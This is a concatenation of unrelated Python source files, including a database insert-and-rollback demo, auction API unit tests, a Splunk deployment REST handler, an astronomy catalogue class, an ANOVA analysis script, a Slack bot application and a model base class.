    # Signal downstream code that no connection is available.
    conn = None
# 2. Obtiene las filas de la tabla estudiante
# Crea el cursor de la conexión y establece la consulta a la tabla estudiantes
print("\n2. Generando la consulta con la base de datos")
cur = conn.cursor()
cur.execute("SELECT id_estudiante, nombre, numero_telefono \
FROM estudiante;")
# Obtiene las filas resultantes de la consulta
print(cur.fetchmany(size=10))
# Obtiene la cantidad de filas afectadas
print("Cantidad de filas: {0}".format(cur.rowcount))
# 3. Inserta un registro en la tabla estudiante y vuelve a consultar las filas de la tabla estudiante
#Crea el cursor
curInsert = conn.cursor()
# Establece los valores de los datos a insertar
idEstudiante = "123456"
nombreEstudiante = "María"
numeroTelefono = "+549 9876 123456"
# Ejecuta la acción de inserción con los datos como parámetros de la consulta
print("\n3. Insertando registro en la base de datos: ({0}, {1}, {2})".format(idEstudiante, nombreEstudiante, numeroTelefono))
curInsert.execute("INSERT INTO estudiante (id_estudiante, nombre, numero_telefono) \
VALUES (%s, %s, %s)", (idEstudiante, nombreEstudiante, numeroTelefono))
# Crea el cursor de la conexión y establece la consulta
cur = conn.cursor()
cur.execute("SELECT id_estudiante, nombre, numero_telefono \
FROM estudiante;")
# Obtiene las filas resultantes de la consulta
print(cur.fetchmany(size=10))
# Obtiene la cantidad de filas afectadas
print("Cantidad de filas: {0}".format(cur.rowcount))
# 4. Undo the modifications (the insert) and close the connection.
# Roll back the uncommitted insert so the database is left unchanged.
print("\n4. Deshaciendo los cambios en la base de datos")
conn.rollback()
# Release the cursors
print("Liberando recursos y cerrando conexión")
cur.close()
curInsert.close()
# Close the database connection
conn.close()
# BUG FIX: a stray trailing '|' character after this print (an extraction
# artifact) was a syntax error and has been removed.
print("Fin del script")
# repository: oleksiyVeretiuk/openprocurement.auctions.geb
# -*- coding: utf-8 -*-
import unittest
from openprocurement.auctions.core.tests.base import snitch
from openprocurement.auctions.geb.tests.base import (
BaseWebTest
)
from openprocurement.auctions.geb.tests.states import (
ProcedureMachine
)
from openprocurement.auctions.geb.tests.fixtures.active_enquiry import (
ACTIVE_ENQUIRY_AUCTION_DEFAULT_FIXTURE_WITH_QUESTION,
AUCTION_WITH_PENDING_BID,
AUCTION_WITH_ACTIVE_BID
)
from openprocurement.auctions.geb.tests.blanks.active_enquiry import (
add_document,
add_offline_document,
add_question,
answer_question,
auction_change_fields,
get_question,
bid_add,
bid_add_document_in_active_status,
bid_add_document_in_pending_status,
bid_delete_in_active_status,
bid_delete_in_pending_status,
bid_get_in_active_status,
bid_get_in_pending_status,
bid_make_activate,
bid_patch_in_active_status,
bid_patch_in_pending_status,
)
class StatusActiveEnquiryTest(BaseWebTest):
    """Tests for an auction in 'active.enquiry' status: bids, questions, field changes."""

    test_bid_add = snitch(bid_add)
    test_add_question = snitch(add_question)
    test_auction_change_fields = snitch(auction_change_fields)

    def setUp(self):
        """Snapshot an 'active.enquiry' auction and precompute the REST entrypoints."""
        super(StatusActiveEnquiryTest, self).setUp()
        procedure = ProcedureMachine()
        procedure.set_db_connector(self.db)
        procedure.toggle('active.enquiry')
        context = procedure.snapshot()
        self.auction = context['auction']

        entrypoints = {}
        entrypoints['patch_auction'] = '/auctions/{}?acc_token={}'.format(self.auction['data']['id'],
                                                                          self.auction['access']['token'])
        entrypoints['get_auction'] = '/auctions/{}'.format(self.auction['data']['id'])
        entrypoints['questions'] = '/auctions/{}/questions'.format(self.auction['data']['id'])
        entrypoints['bids'] = '/auctions/{}/bids'.format(self.auction['data']['id'])
        self.ENTRYPOINTS = entrypoints
class StatusActiveEnquiryQuestionsTest(BaseWebTest):
    """Tests for questions on an 'active.enquiry' auction seeded with an existing question."""

    test_answer_question = snitch(answer_question)
    test_get_question = snitch(get_question)

    def setUp(self):
        """Snapshot an 'active.enquiry' auction from a fixture that already contains a question."""
        super(StatusActiveEnquiryQuestionsTest, self).setUp()
        procedure = ProcedureMachine()
        procedure.set_db_connector(self.db)
        procedure.toggle('active.enquiry')
        context = procedure.snapshot(fixture=ACTIVE_ENQUIRY_AUCTION_DEFAULT_FIXTURE_WITH_QUESTION)
        self.auction = context['auction']
        self.questions = context['questions']
class StatusActiveEnquiryPendingBidsTest(BaseWebTest):
    """Tests for operations on a pending bid of an 'active.enquiry' auction."""

    # document-service support is required by the bid document tests
    docservice = True

    # BUG FIX: test_bid_patch_in_pending_status was assigned twice; the
    # duplicate assignment has been removed.
    test_bid_patch_in_pending_status = snitch(bid_patch_in_pending_status)
    test_bid_make_activate = snitch(bid_make_activate)
    test_bid_add_document_in_pending_status = snitch(bid_add_document_in_pending_status)
    test_bid_delete_in_pending_status = snitch(bid_delete_in_pending_status)
    test_bid_get_in_pending_status = snitch(bid_get_in_pending_status)

    def setUp(self):
        """Snapshot an auction with a pending bid and precompute the bid entrypoints."""
        super(StatusActiveEnquiryPendingBidsTest, self).setUp()
        procedure = ProcedureMachine()
        procedure.set_db_connector(self.db)
        procedure.toggle('active.enquiry')
        context = procedure.snapshot(fixture=AUCTION_WITH_PENDING_BID)
        auction = context['auction']
        bid = context['bids'][0]

        entrypoints = {}
        pattern = '/auctions/{auction}/bids/{bid}?acc_token={token}'
        entrypoints['bid'] = pattern.format(auction=auction['data']['id'],
                                            bid=bid['data']['id'],
                                            token=bid['access']['token'])
        pattern = '/auctions/{auction}/bids/{bid}/documents?acc_token={token}'
        entrypoints['add_bid_document'] = pattern.format(auction=auction['data']['id'],
                                                         bid=bid['data']['id'],
                                                         token=bid['access']['token'])
        self.ENTRYPOINTS = entrypoints
        self.bid = bid
        self.auction = auction
class StatusActiveEnquiryActiveBidsTest(BaseWebTest):
    """Tests for operations on an active bid of an 'active.enquiry' auction."""

    # document-service support is required by the bid document tests
    docservice = True

    # BUG FIX: test_bid_patch_in_active_status was assigned twice; the
    # duplicate assignment has been removed.
    test_bid_patch_in_active_status = snitch(bid_patch_in_active_status)
    test_bid_add_document_in_active_status = snitch(bid_add_document_in_active_status)
    test_bid_delete_in_active_status = snitch(bid_delete_in_active_status)
    test_bid_get_in_active_status = snitch(bid_get_in_active_status)

    def setUp(self):
        """Snapshot an auction with an active bid and precompute the bid entrypoints."""
        super(StatusActiveEnquiryActiveBidsTest, self).setUp()
        procedure = ProcedureMachine()
        procedure.set_db_connector(self.db)
        procedure.toggle('active.enquiry')
        context = procedure.snapshot(fixture=AUCTION_WITH_ACTIVE_BID)
        auction = context['auction']
        bid = context['bids'][0]

        entrypoints = {}
        pattern = '/auctions/{auction}/bids/{bid}?acc_token={token}'
        entrypoints['bid'] = pattern.format(auction=auction['data']['id'],
                                            bid=bid['data']['id'],
                                            token=bid['access']['token'])
        pattern = '/auctions/{auction}/bids/{bid}/documents?acc_token={token}'
        entrypoints['add_bid_document'] = pattern.format(auction=auction['data']['id'],
                                                         bid=bid['data']['id'],
                                                         token=bid['access']['token'])
        self.ENTRYPOINTS = entrypoints
        self.bid = bid
        self.auction = auction
class StatusActiveEnquiryDocumentsTest(BaseWebTest):
    """Tests for adding documents to the auction."""

    # document-service support is required by the document upload tests
    docservice = True

    test_add_document = snitch(add_document)
    test_add_offline_document = snitch(add_offline_document)

    def setUp(self):
        """Snapshot an auction and precompute the documents entrypoint."""
        super(StatusActiveEnquiryDocumentsTest, self).setUp()
        procedure = ProcedureMachine()
        procedure.set_db_connector(self.db)
        # NOTE(review): this toggles 'active.tendering' although the class name
        # says ActiveEnquiry — confirm whether 'active.enquiry' was intended.
        procedure.toggle('active.tendering')
        context = procedure.snapshot()
        self.auction = context['auction']

        entrypoints = {}
        entrypoints['documents'] = '/auctions/{}/documents?acc_token={}'.format(self.auction['data']['id'],
                                                                                self.auction['access']['token'])
        self.ENTRYPOINTS = entrypoints
def suite():
    """Assemble all test cases of this module into one unittest suite."""
    cases = (
        StatusActiveEnquiryTest,
        StatusActiveEnquiryQuestionsTest,
        StatusActiveEnquiryDocumentsTest,
        StatusActiveEnquiryPendingBidsTest,
        StatusActiveEnquiryActiveBidsTest,
    )
    result = unittest.TestSuite()
    for case in cases:
        result.addTest(unittest.makeSuite(case))
    return result
# Allow running this module directly: execute the aggregated suite defined above.
if __name__ == '__main__':
    unittest.main(defaultTest='suite')
|
<filename>app/bin/dltk/core/deployment/rest_handlers.py
from urllib.parse import parse_qs, unquote
import os
from dltk.core.rest import BaseRestHandler
from dltk.core import algorithm
from dltk.core import deployment
from dltk.core import environment
from dltk.core import runtime
from dltk.core import is_truthy
from . core import *
from . get import *
from . jobs import trigger
from . import status
from . params import get_default_param
from dltk.core import get_label_for_name
__all__ = [
"DeploymentsHandler",
"DeploymentParamsHandler"
]
class DeploymentParamsHandler(BaseRestHandler):
    """REST handler for reading and updating deployment parameters."""

    def handle_GET(self):
        """List parameter entries (name, label, default, value).

        Two addressing modes; runtime+environment takes precedence, matching
        the original code where the second `if` overrode the first:
          - runtime + environment: runtime defaults only, no stored values.
          - algorithm + environment: an existing deployment's parameters.
        """
        algorithm_name = self.get_param("algorithm")
        runtime_name = self.get_param("runtime")
        environment_name = self.get_param("environment")
        if runtime_name and environment_name:
            e = environment.get(self.splunk, environment_name)
            r = runtime.get(self.splunk, runtime_name)
            def get_default(name): return get_default_param(name, e, runtime=r)
            def get_value(_): return None
        elif algorithm_name and environment_name:
            d = deployment.get(self.splunk, algorithm_name, environment_name)
            a = d.algorithm
            e = d.environment
            r = a.runtime
            def get_default(name): return get_default_param(name, e, algorithm=a)
            def get_value(name): return d.get_param(name, inherit=False)
        else:
            # Bug fix: the original fell through with r/get_default/get_value
            # undefined (NameError) when neither pair of parameters was
            # supplied; fail with an explicit message instead.
            raise Exception("environment plus either algorithm or runtime required")
        params = [{
            "name": name,
            "label": get_label_for_name(name),
            "default": get_default(name),
            "value": get_value(name),
            "type": "text",  # "picker" "text",
            "mandatory": False,
            "important": True,  # True if name == "executor_instance_count" else False,
        } for name in r.deployment_param_names]
        self.send_entries(params)

    def handle_PUT(self):
        """Update parameter values of an existing deployment; redeploy on change."""
        algorithm_name = self.get_param("algorithm")
        environment_name = self.get_param("environment")
        if not algorithm_name:
            raise Exception("algorithm missing")
        if not environment_name:
            raise Exception("environment missing")
        d = deployment.get(self.splunk, algorithm_name, environment_name)
        if d is None:
            raise Exception("algorithm_name=%s, environment_name=%s" % (algorithm_name, environment_name))
        r = d.algorithm.runtime
        changed_value = False
        for name in r.deployment_param_names:
            value = self.get_param(name)
            if value is not None:
                d.set_param(name, value)
                changed_value = True
        if changed_value:
            # Only trigger a (potentially expensive) redeploy when something changed.
            d.trigger_deploying()
class DeploymentsHandler(BaseRestHandler):
    """REST handler for listing, creating, updating and deleting deployments."""

    def handle_GET(self):
        """List deployments, optionally filtered by algorithm and/or environment."""
        algorithm_name = self.get_param("algorithm")
        environment_name = self.get_param("environment")
        if environment_name and algorithm_name:
            # Bug fix: this branch's result was previously clobbered by an
            # unconditional `if algorithm_name:` that followed it; the chain
            # is now mutually exclusive.
            deployments = [get(self.splunk, algorithm_name, environment_name)]
        elif algorithm_name:
            deployments = get_all_for_algorithm(self.splunk, algorithm_name)
        else:
            deployments = get_all(self.splunk)
        results = []
        # Renamed loop variable: `deployment` shadowed the imported module.
        for d in deployments:
            results.append({
                "algorithm": d.algorithm_name,
                "environment": d.environment_name,
                "status": d.status,
                "status_message": d.status_message,
                "editable": d.editable,
                "editor_url": d.editor_url,
                "disabled": d.is_disabled,
                "restart_required": d.restart_required,
            })
        self.send_entries(results)

    def handle_POST(self):
        """Create a deployment of an algorithm into an environment."""
        algorithm_name = self.get_param("algorithm")
        environment_name = self.get_param("environment")
        if not algorithm_name:
            raise Exception("missing algorithm")
        if not environment_name:
            raise Exception("missing environment")
        a = algorithm.get(self.splunk, algorithm_name)
        e = environment.get(self.splunk, environment_name)
        enable_schedule = self.get_param("enable_schedule")
        if enable_schedule:
            enable_schedule = is_truthy(enable_schedule)
        else:
            # None means "not supplied", distinct from an explicit false.
            enable_schedule = None
        deployment_params = {}
        for name in a.runtime.deployment_param_names:
            value = self.get_param(name)
            if value is not None:
                deployment_params[name] = value
        create(
            self.splunk,
            a.name,
            e.name,
            enable_schedule=enable_schedule,
            params=deployment_params,
        )

    def handle_PUT(self):
        """Update deployment flags (restart_required/editable/disabled) and redeploy."""
        enable_schedule = self.get_param("enable_schedule")
        if enable_schedule is not None:
            enable_schedule = is_truthy(enable_schedule)
        algorithm_name = self.get_param("algorithm")
        if not algorithm_name:
            raise Exception("algorithm missing")
        environment_name = self.get_param("environment")
        if not environment_name:
            raise Exception("environment missing")
        d = deployment.get(self.splunk, algorithm_name, environment_name)
        restart_required = self.get_param("restart_required")
        if restart_required is not None:
            d.restart_required = is_truthy(restart_required)
        editable = self.get_param("editable")
        if editable is not None:
            d.editable = is_truthy(editable)
        is_disabled = self.get_param("disabled")
        if is_disabled is not None:
            d.is_disabled = is_truthy(is_disabled)
        d.trigger_deploying(
            enable_schedule=enable_schedule,
        )

    def handle_DELETE(self):
        """Delete the deployment addressed by algorithm + environment."""
        query = self.request['query']
        algorithm_name = query.get("algorithm", "")
        if not algorithm_name:
            raise Exception("missing algorithm")
        environment_name = query.get("environment", "")
        if not environment_name:
            raise Exception("missing environment")
        d = get(self.splunk, algorithm_name, environment_name)
        if not d:
            self.response.setStatus(404)
            return
        # (Removed an unused `payload = self.request["query"]` local and the
        # dead commented-out handle_POST variant that trailed this class.)
        enable_schedule = query.get("enable_schedule", "")
        if enable_schedule:
            enable_schedule = is_truthy(enable_schedule)
        else:
            enable_schedule = None
        delete(self.splunk, d, enable_schedule=enable_schedule)
|
"""
Python class for handling object catalogs associated with
a data release. The catalogs are obtained from FITS files.
This class does some caching for speed.
"""
import numpy
from ..utils import fits
from ..utils import filehandler
from ..utils.columnstore import ColumnStore
from ..utils.npyquery import Column as ColumnBase
# Python 2/3 compatibility: `basestring` does not exist on Python 3,
# so alias it to `str` there; on Python 2 the builtin is kept.
try:
    basestring
except NameError:
    basestring = str
__author__ = "<NAME> and <NAME>"
__version__ = "1.0"
__email__ = "<EMAIL> or <EMAIL>"
class C(ColumnBase):
    """ `C` provides a shorthand for querying the catalogue
        with the :py:mod:`imaginglss.utils.npyquery` mini language
    """
    def visit(self, catalogue):
        # Resolve this column node against the catalogue: return the data
        # of the column named `self.name` (all rows).
        return catalogue[self.name]
def coord2xyz(coord):
    """
    Convert coord=(RA, DEC), both in degrees, to unit vectors on the sphere.
    A helper function.

    Parameters
    ----------
    coord : array_like
        (RA, DEC) pair, each an array of angles in degrees.

    Returns
    -------
    vector : array_like
        Unit vectors corresponding to RA, DEC, shape (3, N).
    """
    ra, dec = coord
    out = numpy.empty(len(ra), ('f4', 3))
    cos_dec = numpy.cos(dec / 180. * numpy.pi)
    out[:, 0] = cos_dec * numpy.sin(ra / 180. * numpy.pi)
    out[:, 1] = cos_dec * numpy.cos(ra / 180. * numpy.pi)
    out[:, 2] = numpy.sin(dec / 180. * numpy.pi)
    return out.T
def uppercase_dtype(dtype):
    """ Convert a dtype to upper case. A helper function.
        Do not use.
    """
    # dtype.fields maps name -> (dtype, offset); numpy.dtype accepts the
    # same mapping form back, so only the keys need upper-casing.
    renamed = {name.upper(): dtype.fields[name] for name in dtype.names}
    return numpy.dtype(renamed)
def subdtype(dtype, columns):
    """ Build a new dtype restricted to `columns`; on a missing column,
        raise a KeyError that lists the available names.
    """
    try:
        return numpy.dtype([(name, dtype[name]) for name in columns])
    except KeyError as err:
        raise KeyError("%s : candidates are %s." %
                       (str(err), str(sorted(dtype.names))))
def native_dtype(dtype):
    """ Return `dtype` converted to the machine's native byte order.
        A helper function. Do not use.
    """
    return dtype.newbyteorder('=')
class CacheExpired(RuntimeError):
    """Error type for stale caches.

    NOTE(review): no raise site is visible in this chunk — presumably raised
    by the caching layer when an on-disk cache must be rebuilt; confirm.
    """
    pass
class TransformedColumn(object):
    """A lazy column view: on indexing, pull one or more source columns from
    `ref` and apply `transform` to the indexed values.
    """
    def __init__(self, ref, columns, transform):
        # Accept a single column name as well as a list/tuple of names.
        if not isinstance(columns, (tuple, list)):
            columns = [columns]
        self.ref = ref
        self.columns = columns
        self.transform = transform

    def __getitem__(self, index):
        values = tuple(self.ref[name][index] for name in self.columns)
        return self.transform(*values)
class Catalogue(object):
    """
    In-memory object catalogue assembled from per-brick FITS tables.

    Parameters
    ----------
    bricks: list
        a list of bricks names that the catalogue covers.
    format_filename : function
        a function that converts a brick object to a filename of the tractor
        catalogue
    aliases : list
        a list of fields to transform; this is to support migration
        of schema from older data releases to newer ones. The list
        is of the form (oldname, newname, transformfunction)
    Attributes
    ----------
    dtype : dtype
        A container of the data type of columns
        in :py:class:`numpy.dtype`
    """
    def __init__(self, bricks, format_filename, aliases, columns):
        filenames = [ format_filename(brick) for brick in bricks]
        bricknames = [ brick.name for brick in bricks]
        self.filenames = dict(zip(bricknames, filenames))
        # Alias lookup table: newname -> (oldname, transform).
        self.aliases = dict([(new, (old, transform))
            for old, new, transform in aliases])
        data = []
        for brick in bricks:
            data.append(self.open(brick))
        self.COLUMNS = columns
        # All bricks are held in memory as one concatenated record array.
        self.data = numpy.concatenate(data)
    @property
    def size(self):
        # Number of rows in the catalogue.
        return len(self.data)
    def __len__(self):
        return len(self.data)
    @property
    def dtype(self):
        return self.data.dtype
    def open(self, brick):
        # Read one brick's FITS table, keeping only the configured COLUMNS
        # to reduce the memory footprint.
        data = fits.read_table(self.filenames[brick.name])
        dtype = [(column, data.dtype[column]) for column in self.COLUMNS]
        data_compressed = numpy.empty(shape=data.shape, dtype=dtype)
        for column in self.COLUMNS:
            data_compressed[column][...] = data[column]
        return data_compressed
    def __getitem__(self, column):
        # Aliased (renamed/migrated) columns are served lazily through
        # TransformedColumn; everything else comes straight from the array.
        if isinstance(column, basestring) and column in self.aliases:
            old, transform = self.aliases[column]
            return TransformedColumn(self, old, transform)
        else:
            return self.data[column]
    def __repr__(self):
        return 'Catalogue: %s' % str(self.dtype)
class BigFileCatalogue(ColumnStore):
    """
    Column store backed by an on-disk `bigfile` directory (`cachedir`).

    Unlike :py:class:`Catalogue`, data stays on disk and is fetched lazily
    per column via :py:meth:`fetch`. Aliased columns are served through
    TransformedColumn, mirroring Catalogue.
    """
    def __init__(self, cachedir, aliases):
        import bigfile
        self.cachedir = cachedir
        # Probe the file once for its size and dtype; row data is read on demand.
        with bigfile.BigFile(cachedir, create=True) as bf:
            bd = bigfile.BigData(bf)
            self._size = bd.size
            self._dtype = bd.dtype
        # Alias lookup table: newname -> (oldname, transform).
        self.aliases = dict([(new, (old, transform))
            for old, new, transform in aliases])
        ColumnStore.__init__(self)
    @property
    def size(self):
        return self._size
    @property
    def dtype(self):
        return self._dtype
    def open(self, brick):
        raise RuntimeError("FIXME: currently cannot open a brick from a sweep.")
    def __getitem__(self, column):
        if isinstance(column, basestring) and column in self.aliases:
            old, transform = self.aliases[column]
            return TransformedColumn(self, old, transform)
        else:
            return ColumnStore.__getitem__(self, column)
    def fetch(self, column, start, end):
        # Read rows [start:end) of `column` directly from the bigfile on disk.
        import bigfile
        with bigfile.BigFile(self.cachedir) as bf:
            return bf[column][start:end]
    def __repr__(self):
        return 'BigFileCatalogue: %s' % str(self.dtype)
    def neighbours(self, coord, sep):
        # NOTE(review): unimplemented — silently returns None. Confirm whether
        # callers expect a neighbour search result here.
        pass
|
from oeda.databases import setup_experiment_database, setup_user_database, db
from oeda.analysis.factorial_tests import FactorialAnova
from oeda.analysis.analysis_execution import delete_combination_notation, iterate_anova_tables, get_tuples
from collections import OrderedDict
from oeda.utilities.Structures import DefaultOrderedDict
from scipy import stats
import pprint
import json
# Shared pretty-printer for the debug output produced throughout this module.
pp = pprint.PrettyPrinter(indent=4)
def start_workflow_with_anova(experiment_id, step_no, key, alpha, nrOfImportantFactors, executionStrategyType, performAnova=False):
    """Fetch the stage tuples of one experiment step and optionally run ANOVA.

    `alpha`, `nrOfImportantFactors` and `executionStrategyType` are kept in
    the signature for the (currently disabled) significant-interaction
    follow-up workflow.
    """
    stage_ids, samples, knobs = get_tuples(experiment_id, step_no, key)
    if performAnova:
        perform_anova(experiment_id, step_no, stage_ids, samples, knobs, key)
def perform_anova(experiment_id, step_no, stage_ids, samples, knobs, key):
    """Run a factorial (two-way) ANOVA over the samples and print the tables
    before and after ranking the factors by their PR(>F) p-value."""
    anova = FactorialAnova(stage_ids=stage_ids, y_key=key, knob_keys=None, stages_count=len(stage_ids))
    table, table_sqr = anova.run(data=samples, knobs=knobs)
    table = delete_combination_notation(table)
    table_sqr = delete_combination_notation(table_sqr)
    # iterate_anova_tables returns a DefaultOrderedDict keyed by factor name.
    merged = iterate_anova_tables(aov_table=table, aov_table_sqr=table_sqr)
    print("before")
    print(json.dumps(merged, indent=4))
    # Ascending by p-value; entries without a PR(>F) value sort last.
    ranked = OrderedDict(sorted(merged.items(), key=lambda item: (item[1]['PR(>F)'] is None, item[1]['PR(>F)'])))
    print("AFTER")
    print(json.dumps(ranked, indent=4))
def start_workflow_with_ttest(experiment_id, key, alpha):
    """Load the experiment, pull the tuples of its final step, and dump
    everything for inspection.

    `alpha` is unused here; it belongs to the (currently disabled) t-test call.
    """
    experiment = db().get_experiment(experiment_id)
    pp.pprint(experiment)
    final_step = experiment["numberOfSteps"]
    stage_ids, samples, knobs = get_tuples(experiment_id=experiment_id, step_no=final_step, key=key)
    for item in (stage_ids, samples, knobs):
        pp.pprint(item)
def sort():
    """Demo: rank (knob, value) tuples ascending by value.

    Prints the full ranking and the best entry, and returns the sorted list
    (smallest value first) so callers can use the result programmatically —
    the original computed the ranking but discarded it (returned None).
    """
    tuples = [
        ({"ep": 0.2, "rrs": 0.4}, 0.5555),
        ({"ep": 0.5, "rrs": 0.3}, 0.4444),
        ({"ep": 0.2222, "rrs": 0.222}, 0.8888),
        ({"ep": 0.3333, "rrs": 0.333}, 0.6666),
    ]
    sorted_tuples = sorted(tuples, key=lambda x: x[1])
    print("sorted_tuples", sorted_tuples)
    print("best_knob", sorted_tuples[0][0], " best_value", sorted_tuples[0][1])
    return sorted_tuples
def check_normality_assumption(experiment_id, step_no, key, alpha):
    """Return True iff every sample passes the D'Agostino-Pearson normality test.

    The null hypothesis of stats.normaltest is that the sample comes from a
    normal distribution, so pvalue < alpha *rejects* normality.

    Bug fix: the original had the logic inverted — it continued when
    pvalue < alpha (normality rejected) and returned False when
    pvalue >= alpha (the sample consistent with normality).
    """
    stage_ids, samples, knobs = get_tuples(experiment_id, step_no, key)
    for sample in samples:
        statistic, pvalue = stats.normaltest(sample)
        if pvalue < alpha:
            # Normality rejected for this sample -> assumption fails overall.
            return False
    return True
def check_homogenity_of_variance_assumption(experiment_id, step_no, key, alpha):
    """Return True iff Levene's test does not reject equal group variances.

    A non-significant Levene statistic (pvalue >= alpha) indicates the
    groups have (approximately) equal variances.
    """
    stage_ids, samples, knobs = get_tuples(experiment_id, step_no, key)
    statistic, pvalue = stats.levene(*samples)
    return bool(pvalue >= alpha)
if __name__ == '__main__':
    # Ad-hoc driver against a local Elasticsearch; most workflow calls below
    # are intentionally commented out and kept as usage examples.
    nrOfImportantFactors = 3 # to be retrieved from analysis definition
    alpha = 0.05 # to be retrieved from analysis definition
    setup_experiment_database("elasticsearch", "localhost", 9200)
    experiment_id = "076861f3-b77b-d1a3-90c4-cc34c00712aa"
    experiment = db().get_experiment(experiment_id)
    pp.pprint(experiment)
    ttest_step_no = experiment["numberOfSteps"]
    anova_step_no = "1" # 1 denotes step-strategy phase for ANOVA, last one denotes T-test, intermediate ones denote Bayesian Opt
    key = "fuelConsumption"
    # test_data_points(experiment_id, step_no)
    # start_workflow_with_anova(experiment_id, anova_step_no, key, alpha, nrOfImportantFactors, 'self-optimizer', True)
    # start_workflow_with_ttest(experiment_id=experiment_id, key=key, alpha=alpha)
    # normality = check_normality_assumption(experiment_id, anova_step_no, key, alpha)
    # hom_var = check_homogenity_of_variance_assumption(experiment_id, anova_step_no, key, alpha)
    # print("Normality of ANOVA", normality)
    # print("Homogenity of variances ANOVA", hom_var)
    #
    # normality_ttest = check_normality_assumption(experiment_id, ttest_step_no, key, alpha)
    # hom_var_ttest = check_homogenity_of_variance_assumption(experiment_id, ttest_step_no, key, alpha)
    # print("Normality of T-test", normality_ttest)
    # print("Homogenity of variances T-test", hom_var_ttest)
    # asd = db().get_experiment(experiment_id=experiment_id)["numberOfSteps"]
    # all_stage_data = get_all_stage_data(experiment_id=experiment_id)
    # print(json.dumps(all_stage_data, indent=4))
    # print(all_stage_data.keys())
    # print(all_stage_data[1])
    # stage_ids, stages = db().get_stages(experiment_id=experiment_id, step_no=step_no)
|
import json
import os
import time
from typing import List, Callable
from slackclient import SlackClient
from slack_bot.models import Message, Response
from slack_bot.routes import Routers, Route
# Seconds to sleep between RTM read polls; override via env var RTM_READ_DELAY.
RTM_READ_DELAY = int(os.getenv('RTM_READ_DELAY', 1))
class Application:
    """Slack RTM bot application.

    Connects with the given token, routes each incoming RTM event to a
    registered handler (see :meth:`route` / :meth:`add_routes`) and posts
    the handler's Response back to Slack via chat.postMessage.
    """
    def __init__(self, token: str):
        self._token = token
        self._client = None       # lazily connected SlackClient
        self._bot_id = None       # lazily resolved via auth.test
        self._routers = Routers()
    @property
    def bot_id(self) -> str:
        # Resolved once through auth.test and cached for the process lifetime.
        if not self._bot_id:
            self._bot_id = self.client.api_call("auth.test")["user_id"]
        return self._bot_id
    @property
    def client(self) -> SlackClient:
        # Connect on first use; subsequent accesses reuse the session.
        if not self._client:
            self._client = self._client_connected()
        return self._client
    @client.setter
    def client(self, custom_client: SlackClient):
        """
        For easy tests only, add mocked client
        :param SlackClient custom_client: For example MagicMock()
        """
        self._client = custom_client
    def _client_connected(self) -> SlackClient:
        # Open an RTM websocket session; an invalid token makes rtm_connect fail.
        sc = SlackClient(token=self._token)
        if sc.rtm_connect():
            return sc
        raise Exception('Validate your token')
    def _send(self, response: Response) -> bool:
        """
        Response required attributes:
            channel="C1234567890"   Channel, where message wrote
            text="Hello world"      Text, message to response
        Response optional attributes:
            username="MyBotName"
            as_user=True
            attachments=[{"pretext": "pre-hello", "text": "text-world"}]
            blocks=[{"type": "section", "text": {"type": "plain_text", "text": "Hello world"}}]
            icon_emoji=":wink:"
            icon_url="http://lorempixel.com/48/48"
            link_names=True
            mrkdwn=False
            parse='full'
            reply_broadcast=True
            thread_ts='1234567890.123456'
            unfurl_links=True
            unfurl_media=False
        More info: https://api.slack.com/methods/chat.postMessage
            api_call(
                method='chat.postMessage',
                channel='#general',
                text='try it',
                username='Mario',
                icon_emoji=':mario:'
            )
        :param Response response:
        :return: bool
        """
        self.client.api_call(**response.to_dict())
        return True
    def route(self, route, channels=None, users=None):
        """
        Decorator add some bot actions if route wen equal message
        Usage:
            table = RoutersTable()
            @table.route('hello')
            def some_bot_action(request):
                return Response(request=request, text='Hi!')
        :param str route: target message in slack
        :param list[str] channels: only for subscribe channels
        :param list[str] users: only for subscribe users
        """
        def wrapper(handler: Callable):
            self._routers.table.add_route(route, handler, channels, users)
            return handler
        return wrapper
    def add_routes(self, routes: List[Route]):
        """
        Add handlers for all bot actions
        Usage:
            table = RoutersTable()
            table.add_routes([
                Route('hello', say_hello_handler),
                Route('how do you do?', answer_handler),
            ])
        :param list[Route] routes:
        :return: list[Route]
        """
        self._routers.table.add_routes(routes)
    def _process_message(self, raw_msg: List[dict]) -> bool:
        # Returns True only when a matching route handled the event and the
        # response was sent; False for empty reads or unrouted messages.
        if not raw_msg:
            return False
        # parse message and find need handler
        msg = Message(raw_msg)
        route = self._routers.find_route(msg)
        if route is None:
            return False
        # send response to slack
        response = route.handler(msg)
        if not isinstance(response, Response):
            raise TypeError('Handler must be return instance Response class')
        return self._send(response)
    def run(self):
        # Blocking poll loop: read RTM events, dispatch, then sleep.
        while True:
            raw_msg = self.client.rtm_read()
            print(json.dumps(raw_msg))
            self._process_message(raw_msg)
            # all action done
            time.sleep(RTM_READ_DELAY)
|
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 11 15:01:25 2019
The ModelClass parent class. All the actual
models are child classes with (if needed) overloaded methods
@author: Dr. Dr. <NAME>
@web : https://dannyvanpoucke.be
"""
import pandas as pd
import numpy as np
import sys
sys.path.append("../ParallelResults")
from TModelResults import TModelResults
from TDataPoint import TDataPoint
from sklearn.exceptions import ConvergenceWarning
class TModelClass:
    """
    The parent class containing all required methods and properties.
    Properties:
        - nameModel : string containing the name of the model
        - name : the name of this specific instance of the model
        - model: the sklearn model used (set by the child classes, not here)
        - pipeline: a pipeline object containing the preprocessing
              transformations (excluding the fitter function)
        - target : the training target data (pandas dataframe)
        - feature : the original training feature data (remains pandas, so can be recombined with target)
        - feature_tf: the transformed features as obtained by the pipeline (this is a numpy array)
        - target_test: the test target data
        - feature_test: the untransformed features for testing.
        - modelcoef : dictionary keeping track of all relevant model-parameters.
              The values are lists with index 0 giving their print-line.
        - isAverage : Boolean indicating if this is an "average" model
        - hasCI : Boolean indicating if a CI was calculated for the average model
        - CI : Dictionary with the CI for the parameters of the averaged model
        - coefindex : integer giving the line index of coefficient data to add in modelcoef.
        - sanityThresshold : floating point threshold parameter used in sanity checks. [DEFAULT= 1e+9]
    """
    def __init__(self, name: str, Target, Feature: pd.DataFrame,
                 Target_test, Feature_test: pd.DataFrame, **kwargs):
        """
        Constructor of the class, initialising with a default name
        It requires:
            - name : the name of the object instance
            - Feature : a pandas dataframe containing the features
            - kwargs : a list of possible arguments provided specifically
                       for each child class
        """
        # NOTE(review): self.model, self.pipeline and self.feature_tf are not
        # created here — child classes are expected to set them before fit().
        self.nameModel='NoModelClass'
        self.name=name
        self.target=Target
        self.feature=Feature
        self.target_test=Target_test
        self.feature_test=Feature_test #transformation happens only at quality assessment
        self.modelcoef = dict()
        self.isAverage = False
        self.hasCI = False
        self.CI = dict()
